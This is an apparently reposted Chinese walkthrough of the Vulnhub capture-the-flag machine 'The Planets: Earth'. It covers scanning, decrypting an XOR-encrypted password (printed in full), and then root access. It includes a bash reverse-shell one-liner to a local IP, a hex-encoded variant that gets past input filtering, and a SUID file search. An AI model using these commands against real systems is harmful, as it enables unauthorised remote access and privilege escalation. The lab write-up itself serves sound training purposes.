1. 程式人生 > 其它 >Vulnhub - THE PLANETS: EARTH

Vulnhub - THE PLANETS: EARTH

環境配置

從www.vulnhub.com下載靶機,在VMware中匯入,自動分配IP

主機發現

通過對內網主機的掃描,VMware為目標主機

埠掃描

使用nmap對主機進行掃描

發現443埠資訊中寫入了DNS的相關資訊
配置本地的DNS資訊

頁面訪問正常

目錄掃描

使用kali中的dirb對站點進行目錄掃描

頁面存在rebots.txt檔案

訪問最後的testingnotes檔案,為測試筆記,訪問testingnotes.txt

關鍵資訊:
使用XOR加密演算法
testdata.txt 為測試加密
terra為管理員的使用者名稱

破解密碼

測試資料
37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40
3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45
2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a
破解XOR程式碼
import binascii
data1 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"
f = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()
print(hex(int(data1,16) ^ int(f,16)))

得到的結果 0x6561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174

使用編碼工具進行解碼

得到登入密碼為earthclimatechangebad4humans
使用者名稱密碼都存在,需要找到登入入口
對erath.local進行目錄掃描,存在登入入口



使用得到使用者名稱密碼進行登入,登入成功為

第一個flag為/var/earth_web/user_flag.txt

提權

反彈shell
bash -i >& /dev/tcp/192.168.1.126/1234 0>&1

系統進行了限制,使用16進位制進行繞過
bash -i >& /dev/tcp/0xc0.0xa8.0x1.0x7e/1234 0>&1

shell返回成功,進行下一步提權操作
查詢本地具有root許可權檔案
find / -perm -u=s -type f 2>/dev/null

執行reset_root檔案,出現報錯
將檔案下載到本地,進行下一步除錯

使用strace命令進行除錯

缺少以下檔案
/dev/shm/kHgTFI5G
/dev/shm/Zw7bV9U5
/tmp/kcM0Wewe
建立相應檔案再次執行


提權成功,檢視相應的flag

好好學習72變,因為將來 沒有人能替你阻擋81難 。 生如螻蟻,當有鴻鵠之志; 命如紙薄,應有不屈之心